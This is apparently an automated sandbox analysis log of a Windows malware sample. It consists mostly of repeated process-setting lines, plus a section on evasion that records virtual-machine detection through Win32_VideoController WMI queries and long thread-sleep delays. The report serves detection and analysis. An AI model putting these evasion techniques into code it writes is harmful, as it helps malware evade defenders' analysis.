                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 9D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 7280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 8430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 9430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5879Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3799Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWindow / User API: threadDelayed 8472Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWindow / User API: threadDelayed 1363Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe TID: 6156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe TID: 3636Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
